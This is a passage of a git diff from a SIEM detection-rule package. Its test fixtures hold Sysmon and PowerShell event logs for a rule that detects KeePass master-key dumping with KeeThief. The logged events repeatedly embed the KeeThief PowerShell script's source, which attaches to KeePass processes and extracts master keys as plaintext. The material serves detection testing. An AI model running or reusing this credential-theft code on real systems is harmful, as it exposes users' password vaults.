'EncryptedBlobAddress' $UserKey.encryptedBlobAddress $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob if($KeyType -eq 'KcpPassword') { $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob) } else { $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob) } $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext if($KeyType -eq 'KcpUserAccount') { try { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $UserName = $WMIProcess.GetOwner().User $ProtectedUserKeyPath = Resolve-Path -Path \"$($Env:WinDir | Split-Path -Qualifier)\\Users\\*$UserName*\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath } catch { Write-Warning \"Error enumerating the owner of $($KeePassProcess.ID) : $_\" } } else { $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath } $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys') $UserKeyObject } } } else { Write-Verbose \"No keys found for $($KeePassProcess.ID)\" } } else { Write-Warning \"Only KeePass 2.X is supported at this time.\" } } }}", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-06T11:33:47.757Z", "status": "success", "subject": "account", "subject.account.id": "S-1-5-18", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T18:55:02.710Z", "type": "raw", "uuid": "3e774e05-1f1a-4b58-812a-3127158afc3a"} -expect 1 {"correlation_name": "Keepass_Key_Dump_Via_KeeThief"} \ No newline at end of file +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "extract", "alert.context": "getmethod('getkeepassmasterkeys').invoke", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "Credentials from Password Stores: Password Managers", "correlation_name": "Keepass_Key_Dump_Via_KeeThief", "correlation_type": "incident", "datafield6": "0x06160000", "event_src.category": "Other", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Keepass_Key_Dump_Via_KeeThief|iewin7|c:\\program files\\keepass password safe 2\\keepass.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "numfield1": 1, "numfield2": 1, "object": "application", "object.id": "1384", "object.process.fullpath": "c:\\program files\\keepass password safe 2\\keepass.exe", "object.process.guid": "365abb72-a201-5cc4-0000-00104f500800", "object.process.id": "2364", "object.process.name": "keepass.exe", "object.process.path": "c:\\program files\\keepass password safe 2\\", "status": "success", "subject.account.id": "S-1-5-18", "subject.id": "d4643a9b-6f64-4fbc-95e8-c2524689590f", "subject.process.cmdline": "# requires -version 2function Get-KeePassDatabaseKey {<# .SYNOPSIS Retrieves database mastey key information for unlocked KeePass database. Function: Get-KeePassDatabaseKey Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline. Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys() method on it. GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey. If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount) is extracted, including the DPAPI encrypted data blobs of key data. For any encrypted blobs found, shellcode is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs, returning the plaintext/unprotected key data. .PARAMETER Process Optional KeePass process object to pass in on the pipeline. .EXAMPLE PS C:\\> Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49045328 EncryptedBlob : {113, 148, 127, 29...} EncryptedBlobLen : 64 PlaintextBlob : {120, 181, 162, 116...} Plaintext : eLWidCSt... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpKeyFile KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49037240 EncryptedBlob : {137, 185, 6, 97...} EncryptedBlobLen : 32 PlaintextBlob : {177, 5, 150, 205...} Plaintext : sQWWzdcT... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\Documents\\s.license Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpPassword KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 48920376 EncryptedBlob : {228, 78, 75, 16...} EncryptedBlobLen : 16 PlaintextBlob : {80, 97, 115, 115...} Plaintext : Password123! KeyFilePath : .EXAMPLE PS C:\\> Get-Process KeePass | Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount ....# > [CmdletBinding()] param ( [Parameter(Position = 0, ValueFromPipeline = $True)] [System.Diagnostics.Process[]] [ValidateNotNullOrEmpty()] $Process ) BEGIN { if(-not $PSBoundParameters['Process']) { try { $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\.'} } catch { throw 'No KeePass 2.X instances open!' } } # load file off of disk instead # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\ReleaseKeePass.exe).FullName) # the KeyTheft assembly, generated with \"Out-CompressedDll -FilePath .\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\compressed.ps1\" } PROCESS { ForEach($KeePassProcess in $Process) { if($KeePassProcess.FileVersion -match '^2\\.') { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath Write-Verbose \"Examining KeePass process $($KeePassProcess.ID) for master keys\" $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess)) if($Keys) { ForEach ($Key in $Keys) { ForEach($UserKey in $Key.UserKeys) { $KeyType = $UserKey.GetType().Name $UserKeyObject = New-Object PSObject $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob if($KeyType -eq 'KcpPassword') { $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob) } else { $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob) } $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext if($KeyType -eq 'KcpUserAccount') { try { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $UserName = $WMIProcess.GetOwner().User $ProtectedUserKeyPath = Resolve-Path -Path \"$($Env:WinDir | Split-Path -Qualifier)\\Users\\*$UserName*\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath } catch { Write-Warning \"Error enumerating the owner of $($KeePassProcess.ID) : $_\" } } else { $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath } $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys') $UserKeyObject } } } else { Write-Verbose \"No keys found for $($KeePassProcess.ID)\" } } else { Write-Warning \"Only KeePass 2.X is supported at this time.\" } } }}", "subject.process.fullpath": "C:\\Users\\Administrator\\Downloads\\KeeThief_test\\KeeThief-master\\KeeTheft\\KeeTheft\\KeeThief.ps1", "subject.process.id": "7064", "subject.process.name": "KeeThief.ps1", "subject.process.path": "C:\\Users\\Administrator\\Downloads\\KeeThief_test\\KeeThief-master\\KeeTheft\\KeeTheft\\"} \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_3.sc deleted file mode 100644 index 4cf998cb..00000000 --- a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_3.sc +++ /dev/null @@ -1,7 +0,0 @@ -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"8\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"8\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T18:55:04.9801378Z\"},\"EventRecordID\":\"7071\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1816\",\"ThreadID\":\"1228\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-27 18:55:04.980\"},{\"Name\":\"SourceProcessGuid\",\"text\":\"{365abb72-a512-5cc4-0000-0010c05e1b00}\"},{\"Name\":\"SourceProcessId\",\"text\":\"2856\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"},{\"Name\":\"TargetProcessGuid\",\"text\":\"{365abb72-a201-5cc4-0000-00104f500800}\"},{\"Name\":\"TargetProcessId\",\"text\":\"2364\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Program Files\\\\KeePass Password Safe 2\\\\KeePass.exe\"},{\"Name\":\"NewThreadId\",\"text\":\"1384\"},{\"Name\":\"StartAddress\",\"text\":\"0x06160000\"},{\"Name\":\"StartModule\"},{\"Name\":\"StartFunction\"}]}}}", "category.generic": "Thread", "category.high": "Availability Management", "category.low": "Control", "datafield6": "0x06160000", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_8_Create_remote_thread", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "8", "normalized": true, "object": "thread", "object.id": "1384", "object.process.fullpath": "c:\\program files\\keepass password safe 2\\keepass.exe", "object.process.guid": "365abb72-a201-5cc4-0000-00104f500800", "object.process.id": "2364", "object.process.name": "keepass.exe", "object.process.path": "c:\\program files\\keepass password safe 2\\", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-06T03:10:10.818Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "subject.process.guid": "365abb72-a512-5cc4-0000-0010c05e1b00", "subject.process.id": "2856", "subject.process.name": "powershell.exe", "subject.process.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T18:55:04.980Z", "type": "raw", "uuid": "d26cbfcd-61bb-4a46-83a3-3a1379d98dbc"} -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"8\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"8\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T18:55:04.7106082Z\"},\"EventRecordID\":\"7070\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1816\",\"ThreadID\":\"1228\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-27 18:55:04.710\"},{\"Name\":\"SourceProcessGuid\",\"text\":\"{365abb72-a512-5cc4-0000-0010c05e1b00}\"},{\"Name\":\"SourceProcessId\",\"text\":\"2856\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"},{\"Name\":\"TargetProcessGuid\",\"text\":\"{365abb72-a201-5cc4-0000-00104f500800}\"},{\"Name\":\"TargetProcessId\",\"text\":\"2364\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Program Files\\\\KeePass Password Safe 2\\\\KeePass.exe\"},{\"Name\":\"NewThreadId\",\"text\":\"3796\"},{\"Name\":\"StartAddress\",\"text\":\"0x76FAEC4B\"},{\"Name\":\"StartModule\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll\"},{\"Name\":\"StartFunction\",\"text\":\"DbgUiRemoteBreakin\"}]}}}", "category.generic": "Thread", "category.high": "Availability Management", "category.low": "Control", "datafield6": "0x76FAEC4B", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_8_Create_remote_thread", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "8", "normalized": true, "object": "thread", "object.fullpath": "c:\\windows\\system32\\ntdll.dll", "object.id": "3796", "object.name": "ntdll.dll", "object.path": "c:\\windows\\system32\\", "object.process.fullpath": "c:\\program files\\keepass password safe 2\\keepass.exe", "object.process.guid": "365abb72-a201-5cc4-0000-00104f500800", "object.process.id": "2364", "object.process.name": "keepass.exe", "object.process.path": "c:\\program files\\keepass password safe 2\\", "object.property": "start function", "object.value": "DbgUiRemoteBreakin", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-06T03:10:10.818Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "subject.process.guid": "365abb72-a512-5cc4-0000-0010c05e1b00", "subject.process.id": "2856", "subject.process.name": "powershell.exe", "subject.process.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T18:55:04.710Z", "type": "raw", "uuid": "45f9b787-ef50-4e90-9a77-52c768689039"} -{"action": "execute", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-PowerShell\",\"Guid\":\"{a0c1853b-5c40-4b15-8766-3cf1c58f985a}\"},\"EventID\":\"4104\",\"Version\":\"1\",\"Level\":\"3\",\"Task\":\"2\",\"Opcode\":\"15\",\"Keywords\":\"0x0\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T18:55:02.7106082Z\"},\"EventRecordID\":\"273644\",\"Correlation\":{\"ActivityID\":\"{83cf053f-9302-0000-d6c4-7b840293d901}\"},\"Execution\":{\"ProcessID\":\"7064\",\"ThreadID\":\"5708\"},\"Channel\":\"Microsoft-Windows-PowerShell/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"text\":\"1\",\"Name\":\"MessageNumber\"},{\"text\":\"1\",\"Name\":\"MessageTotal\"},{\"text\":\"# requires -version 2\\n\\nfunction Get-KeePassDatabaseKey {\\n<# \\n .SYNOPSIS\\n \\n Retrieves database mastey key information for unlocked KeePass database.\\n\\n Function: Get-KeePassDatabaseKey\\n Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y)\\n License: BSD 3-Clause\\n Required Dependencies: None\\n Optional Dependencies: None\\n\\n .DESCRIPTION\\n \\n Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline.\\n Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys()\\n method on it. GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate\\n all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted\\n from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey.\\n If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount)\\n is extracted, including the DPAPI encrypted data blobs of key data. For any encrypted blobs found, shellcode\\n is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs,\\n returning the plaintext/unprotected key data.\\n\\n .PARAMETER Process\\n\\n Optional KeePass process object to pass in on the pipeline.\\n\\n .EXAMPLE\\n\\n PS C:\\\\> Get-KeePassDatabaseKey -Verbose\\n VERBOSE: Examining KeePass process 4184 for master keys\\n\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpUserAccount\\n KeePassVersion : 2.34.0.0\\n ProcessID : 4184\\n ExecutablePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\KeePass-2.34\\\\KeePass.exe\\n EncryptedBlobAddress : 49045328\\n EncryptedBlob : {113, 148, 127, 29...}\\n EncryptedBlobLen : 64\\n PlaintextBlob : {120, 181, 162, 116...}\\n Plaintext : eLWidCSt...\\n KeyFilePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\AppData\\\\Roaming\\\\KeePass\\\\ProtectedUserKey.bin\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpKeyFile\\n KeePassVersion : 2.34.0.0\\n ProcessID : 4184\\n ExecutablePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\KeePass-2.34\\\\KeePass.exe\\n EncryptedBlobAddress : 49037240\\n EncryptedBlob : {137, 185, 6, 97...}\\n EncryptedBlobLen : 32\\n PlaintextBlob : {177, 5, 150, 205...}\\n Plaintext : sQWWzdcT...\\n KeyFilePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Documents\\\\s.license\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpPassword\\n KeePassVersion : 2.34.0.0\\n ProcessID : 4184\\n ExecutablePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\KeePass-2.34\\\\KeePass.exe\\n EncryptedBlobAddress : 48920376\\n EncryptedBlob : {228, 78, 75, 16...}\\n EncryptedBlobLen : 16\\n PlaintextBlob : {80, 97, 115, 115...}\\n Plaintext : Password123!\\n KeyFilePath :\\n\\n .EXAMPLE\\n\\n PS C:\\\\> Get-Process KeePass | Get-KeePassDatabaseKey -Verbose\\n VERBOSE: Examining KeePass process 4184 for master keys\\n\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpUserAccount\\n ....\\n# >\\n [CmdletBinding()] \\n param (\\n [Parameter(Position = 0, ValueFromPipeline = $True)]\\n [System.Diagnostics.Process[]]\\n [ValidateNotNullOrEmpty()]\\n $Process\\n )\\n \\n BEGIN {\\n if(-not $PSBoundParameters['Process']) {\\n try {\\n $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\\\.'}\\n }\\n catch {\\n throw 'No KeePass 2.X instances open!'\\n }\\n }\\n\\n # load file off of disk instead\\n # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\\\ReleaseKeePass.exe).FullName)\\n\\n # the KeyTheft assembly, generated with \\\"Out-CompressedDll -FilePath .\\\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\\\compressed.ps1\\\"\\n\\n }\\n\\n PROCESS {\\n\\n ForEach($KeePassProcess in $Process) {\\n\\n if($KeePassProcess.FileVersion -match '^2\\\\.') {\\n\\n $WMIProcess = Get-WmiObject win32_process -Filter \\\"ProcessID = $($KeePassProcess.ID)\\\"\\n $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath\\n\\n Write-Verbose \\\"Examining KeePass process $($KeePassProcess.ID) for master keys\\\"\\n\\n $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess))\\n\\n if($Keys) {\\n\\n ForEach ($Key in $Keys) {\\n\\n ForEach($UserKey in $Key.UserKeys) {\\n\\n $KeyType = $UserKey.GetType().Name\\n\\n $UserKeyObject = New-Object PSObject\\n $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation\\n $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType\\n $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion\\n $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID\\n $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath\\n $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress\\n $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob\\n $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen\\n $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob\\n\\n if($KeyType -eq 'KcpPassword') {\\n $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob)\\n }\\n else {\\n $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob)\\n }\\n\\n $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext\\n\\n if($KeyType -eq 'KcpUserAccount') {\\n try {\\n $WMIProcess = Get-WmiObject win32_process -Filter \\\"ProcessID = $($KeePassProcess.ID)\\\"\\n $UserName = $WMIProcess.GetOwner().User\\n\\n $ProtectedUserKeyPath = Resolve-Path -Path \\\"$($Env:WinDir | Split-Path -Qualifier)\\\\Users\\\\*$UserName*\\\\AppData\\\\Roaming\\\\KeePass\\\\ProtectedUserKey.bin\\\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path\\n\\n $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath\\n\\n }\\n catch {\\n Write-Warning \\\"Error enumerating the owner of $($KeePassProcess.ID) : $_\\\"\\n }\\n }\\n else {\\n $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath\\n }\\n\\n $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys')\\n $UserKeyObject\\n }\\n }\\n }\\n else {\\n Write-Verbose \\\"No keys found for $($KeePassProcess.ID)\\\"\\n }\\n }\\n else {\\n Write-Warning \\\"Only KeePass 2.X is supported at this time.\\\"\\n }\\n }\\n }\\n}\\n\",\"Name\":\"ScriptBlockText\"},{\"text\":\"d4643a9b-6f64-4fbc-95e8-c2524689590f\",\"Name\":\"ScriptBlockId\"},{\"text\":\"C:\\\\Users\\\\Administrator\\\\Downloads\\\\KeeThief_test\\\\KeeThief-master\\\\KeeTheft\\\\KeeTheft\\\\KeeThief.ps1\",\"Name\":\"Path\"}]}}}", "category.generic": "Command", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Operating system", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-PowerShell/Operational", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Common_PowerShell_4104_Command_executed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4104", "normalized": true, "numfield1": 1, "numfield2": 1, "object": "command", "object.account.id": "S-1-5-18", "object.fullpath": "C:\\Users\\Administrator\\Downloads\\KeeThief_test\\KeeThief-master\\KeeTheft\\KeeTheft\\KeeThief.ps1", "object.id": "d4643a9b-6f64-4fbc-95e8-c2524689590f", "object.name": "KeeThief.ps1", "object.path": "C:\\Users\\Administrator\\Downloads\\KeeThief_test\\KeeThief-master\\KeeTheft\\KeeTheft\\", "object.process.cmdline": "# requires -version 2function Get-KeePassDatabaseKey {<# .SYNOPSIS Retrieves database mastey key information for unlocked KeePass database. Function: Get-KeePassDatabaseKey Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline. Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys() method on it. GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey. If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount) is extracted, including the DPAPI encrypted data blobs of key data. For any encrypted blobs found, shellcode is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs, returning the plaintext/unprotected key data. .PARAMETER Process Optional KeePass process object to pass in on the pipeline. .EXAMPLE PS C:\\> Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49045328 EncryptedBlob : {113, 148, 127, 29...} EncryptedBlobLen : 64 PlaintextBlob : {120, 181, 162, 116...} Plaintext : eLWidCSt... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpKeyFile KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49037240 EncryptedBlob : {137, 185, 6, 97...} EncryptedBlobLen : 32 PlaintextBlob : {177, 5, 150, 205...} Plaintext : sQWWzdcT... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\Documents\\s.license Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpPassword KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 48920376 EncryptedBlob : {228, 78, 75, 16...} EncryptedBlobLen : 16 PlaintextBlob : {80, 97, 115, 115...} Plaintext : Password123! KeyFilePath : .EXAMPLE PS C:\\> Get-Process KeePass | Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount ....# > [CmdletBinding()] param ( 